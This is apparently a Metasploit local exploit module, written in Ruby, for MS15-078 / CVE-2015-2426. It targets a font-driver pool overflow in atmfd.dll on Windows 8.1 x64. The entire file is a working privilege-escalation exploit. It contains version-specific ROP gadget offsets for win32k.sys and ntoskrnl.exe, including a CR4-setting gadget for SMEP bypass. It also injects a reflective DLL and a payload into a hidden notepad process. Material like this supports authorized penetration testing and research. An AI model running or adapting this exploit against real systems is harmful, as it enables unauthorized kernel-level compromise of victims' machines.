require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = ManualRanking
WIN32K_VERSIONS = [
'6.3.9600.17393',
'6.3.9600.17630',
'6.3.9600.17694',
'6.3.9600.17796',
'6.3.9600.17837',
'6.3.9600.17915'
]
NT_VERSIONS = [
'6.3.9600.17415',
'6.3.9600.17630',
'6.3.9600.17668',
'6.3.9600.17936'
]
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'MS15-078 Microsoft Windows Font Driver Buffer Overflow',
'Description' => %q{
This module exploits a pool based buffer overflow in the atmfd.dll driver when parsing
a malformed font. The vulnerability was exploited by the hacking team and disclosed on
the july data leak. This module has been tested successfully on vulnerable builds of
Windows 8.1 x64.
},
'License' => MSF_LICENSE,
'Author' => [
'Eugene Ching',
'Mateusz Jurczyk',
'Cedric Halbronn',
'juan vazquez'
],
'Arch' => ARCH_X86_64,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' => {
'EXITFUNC' => 'thread',
},
'Targets' => [
[ 'Windows 8.1 x64', { } ]
],
'Payload' => {
'Space' => 4096,
'DisableNops' => true
},
'References' => [
['CVE', '2015-2426'],
['CVE', '2015-2433'],
['MSB', 'MS15-078'],
['MSB', 'MS15-080'],
['URL', 'https://github.com/vlad902/hacking-team-windows-kernel-lpe'],
['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2015/september/exploiting-cve-2015-2426-and-how-i-ported-it-to-a-recent-windows-8.1-64-bit/'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=369'],
['URL', 'https://code.google.com/p/google-security-research/issues/detail?id=480']
],
'DisclosureDate' => 'Jul 11 2015',
'DefaultTarget' => 0
}))
end
def patch_win32k_offsets(dll)
@win32k_offsets.each do |k, v|
case k
when 'info_leak'
dll.gsub!([0xdeedbeefdeedbe00].pack('Q<'), [v].pack('Q<'))
when 'pop_rax_ret'
dll.gsub!([0xdeedbeefdeedbe01].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp'
dll.gsub!([0xdeedbeefdeedbe02].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool'
dll.gsub!([0xdeedbeefdeedbe03].pack('Q<'), [v].pack('Q<'))
when 'pop_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe04].pack('Q<'), [v].pack('Q<'))
when 'deref_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe05].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_into_rcx'
dll.gsub!([0xdeedbeefdeedbe06].pack('Q<'), [v].pack('Q<'))
when 'pop_rbx_ret'
dll.gsub!([0xdeedbeefdeedbe07].pack('Q<'), [v].pack('Q<'))
when 'ret'
dll.gsub!([0xdeedbeefdeedbe08].pack('Q<'), [v].pack('Q<'))
when 'mov_rax_r11_ret'
dll.gsub!([0xdeedbeefdeedbe09].pack('Q<'), [v].pack('Q<'))
when 'add_rax_rcx_ret'
dll.gsub!([0xdeedbeefdeedbe0a].pack('Q<'), [v].pack('Q<'))
when 'pop_rsp_ret'
dll.gsub!([0xdeedbeefdeedbe0b].pack('Q<'), [v].pack('Q<'))
when 'xchg_rax_rsp_adjust'
dll.gsub!([0xdeedbeefdeedbe0c].pack('Q<'), [v].pack('Q<'))
when 'chwnd_delete'
dll.gsub!([0xdeedbeefdeedbe0d].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_win32k_offsets
@win32k_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17393'
{
'info_leak' => 0x3cf00,
'pop_rax_ret' => 0x19fab,
'xchg_rax_rsp' => 0x6121,
'allocate_pool' => 0x352220,
'pop_rcx_ret' => 0x98156,
'deref_rax_into_rcx' => 0xc432f,
'mov_rax_into_rcx' => 0xc4332,
'pop_rbx_ret' => 0x14db,
'ret' => 0x6e314,
'mov_rax_r11_ret' => 0x7018e,
'add_rax_rcx_ret' => 0xee38f,
'pop_rsp_ret' => 0xbc8f,
'xchg_rax_rsp_adjust' => 0x189a3a,
'chwnd_delete' => 0x165010
}
when '6.3.9600.17630'
{
'info_leak' => 0x3d200,
'pop_rax_ret' => 0x19e9b,
'xchg_rax_rsp' => 0x6024,
'allocate_pool' => 0x351220,
'pop_rcx_ret' => 0x84f4f,
'deref_rax_into_rcx' => 0xc3f7f,
'mov_rax_into_rcx' => 0xc3f82,
'pop_rbx_ret' => 0x14db,
'ret' => 0x14dc,
'mov_rax_r11_ret' => 0x7034e,
'add_rax_rcx_ret' => 0xed33b,
'pop_rsp_ret' => 0xbb93,
'xchg_rax_rsp_adjust' => 0x17c78c,
'chwnd_delete' => 0x146EE0
}
when '6.3.9600.17694'
{
'info_leak' => 0x3d300,
'pop_rax_ret' => 0x151f4,
'xchg_rax_rsp' => 0x600c,
'allocate_pool' => 0x351220,
'pop_rcx_ret' => 0x2cf10,
'deref_rax_into_rcx' => 0xc3757,
'mov_rax_into_rcx' => 0xc375a,
'pop_rbx_ret' => 0x6682,
'ret' => 0x6683,
'mov_rax_r11_ret' => 0x7010e,
'add_rax_rcx_ret' => 0xecd7b,
'pop_rsp_ret' => 0x71380,
'xchg_rax_rsp_adjust' => 0x178c84,
'chwnd_delete' => 0x1513D8
}
when '6.3.9600.17796'
{
'info_leak' => 0x3d000,
'pop_rax_ret' => 0x19e4f,
'xchg_rax_rsp' => 0x5f64,
'allocate_pool' => 0x352220,
'pop_rcx_ret' => 0x97a5e,
'deref_rax_into_rcx' => 0xc3aa7,
'mov_rax_into_rcx' => 0xc3aaa,
'pop_rbx_ret' => 0x1B20,
'ret' => 0x1B21,
'mov_rax_r11_ret' => 0x7010e,
'add_rax_rcx_ret' => 0xecf8b,
'pop_rsp_ret' => 0x29fd3,
'xchg_rax_rsp_adjust' => 0x1789e4,
'chwnd_delete' => 0x150F58
}
when '6.3.9600.17837'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1a51f,
'xchg_rax_rsp' => 0x62b4,
'allocate_pool' => 0x351220,
'pop_rcx_ret' => 0x97a4a,
'deref_rax_into_rcx' => 0xc3687,
'mov_rax_into_rcx' => 0xc368a,
'pop_rbx_ret' => 0x14db,
'ret' => 0x14dc,
'mov_rax_r11_ret' => 0x94871,
'add_rax_rcx_ret' => 0xecbdb,
'pop_rsp_ret' => 0xbd2c,
'xchg_rax_rsp_adjust' => 0x15e84c,
'chwnd_delete' => 0x15A470
}
when '6.3.9600.17915'
{
'info_leak' => 0x3d800,
'pop_rax_ret' => 0x1A4EF,
'xchg_rax_rsp' => 0x62CC,
'allocate_pool' => 0x351220,
'pop_rcx_ret' => 0x9765A,
'deref_rax_into_rcx' => 0xC364F,
'mov_rax_into_rcx' => 0xC3652,
'pop_rbx_ret' => 0x14DB,
'ret' => 0x14DC,
'mov_rax_r11_ret' => 0x7060e,
'add_rax_rcx_ret' => 0xECDCB,
'pop_rsp_ret' => 0xbe33,
'xchg_rax_rsp_adjust' => 0x15e5fc,
'chwnd_delete' => 0x15A220
}
else
nil
end
end.call(@win32k)
end
def patch_nt_offsets(dll)
@nt_offsets.each do |k, v|
case k
when 'set_cr4'
dll.gsub!([0xdeedbeefdeedbe0e].pack('Q<'), [v].pack('Q<'))
when 'allocate_pool_with_tag'
dll.gsub!([0xdeedbeefdeedbe0f].pack('Q<'), [v].pack('Q<'))
end
end
end
def set_nt_offsets
@nt_offsets ||= Proc.new do |version|
case version
when '6.3.9600.17415'
{
'set_cr4' => 0x38a3cc,
'allocate_pool_with_tag' => 0x2a3a50
}
when '6.3.9600.17630'
{
'set_cr4' => 0x38A3BC,
'allocate_pool_with_tag' => 0x2A3A50
}
when '6.3.9600.17668'
{
'set_cr4' => 0x38A3BC,
'allocate_pool_with_tag' => 0x2A3A50
}
when '6.3.9600.17936'
{
'set_cr4' => 0x3863bc,
'allocate_pool_with_tag' => 0x29FA50
}
else
nil
end
end.call(@ntoskrnl)
end
def atmfd_version
file_path = expand_path('%windir%') << '\\system32\\atmfd.dll'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("atmfd.dll file version: #{ver} branch: #{branch}")
ver
end
def win32k_version
file_path = expand_path('%windir%') << '\\system32\\win32k.sys'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("win32k.sys file version: #{ver} branch: #{branch}")
ver
end
def ntoskrnl_version
file_path = expand_path('%windir%') << '\\system32\\ntoskrnl.exe'
major, minor, build, revision, branch = file_version(file_path)
return nil if major.nil?
ver = "#{major}.#{minor}.#{build}.#{revision}"
vprint_status("ntoskrnl.exe file version: #{ver} branch: #{branch}")
ver
end
def check
if sysinfo['OS'] !~ /Windows 8/i
return Exploit::CheckCode::Unknown
end
if sysinfo['Architecture'] !~ /(wow|x)64/i
return Exploit::CheckCode::Unknown
end
atmfd = atmfd_version
unless atmfd && Gem::Version.new(atmfd) <= Gem::Version.new('5.1.2.243')
return Exploit::CheckCode::Safe
end
@win32k = win32k_version
unless @win32k && WIN32K_VERSIONS.include?(@win32k)
return Exploit::CheckCode::Detected
end
@ntoskrnl = ntoskrnl_version
unless @ntoskrnl && NT_VERSIONS.include?(@ntoskrnl)
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Appears
end
def exploit
print_status('Checking target...')
if is_system?
fail_with(Failure::None, 'Session is already elevated')
end
check_result = check
if check_result == Exploit::CheckCode::Safe
fail_with(Failure::NotVulnerable, 'Target not vulnerable')
end
if check_result == Exploit::CheckCode::Unknown
fail_with(Failure::NotVulnerable, 'Exploit not available on this system.')
end
if check_result == Exploit::CheckCode::Detected
fail_with(Failure::NotVulnerable, 'ROP chain not available for the target nt/win32k')
end
unless get_target_arch == ARCH_X86_64
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
end
print_status("Exploiting with win32k #{@win32k} and nt #{@ntoskrnl}...")
set_win32k_offsets
fail_with(Failure::NoTarget, 'win32k.sys offsets not available') if @win32k_offsets.nil?
set_nt_offsets
fail_with(Failure::NoTarget, 'ntoskrnl.exe offsets not available') if @nt_offsets.nil?
begin
print_status('Launching notepad to host the exploit...')
notepad_process = client.sys.process.execute('notepad.exe', nil, {'Hidden' => true})
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
print_status('Operation failed. Trying to elevate the current process...')
process = client.sys.process.open
end
library_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-2426', 'reflective_dll.x64.dll')
library_path = ::File.expand_path(library_path)
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
dll = ''
::File.open(library_path, 'rb') { |f| dll = f.read }
patch_win32k_offsets(dll)
patch_nt_offsets(dll)
exploit_mem, offset = inject_dll_data_into_process(process, dll)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
print_status('Payload injected. Executing exploit...')
process.thread.create(exploit_mem + offset, payload_mem)
print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
end
end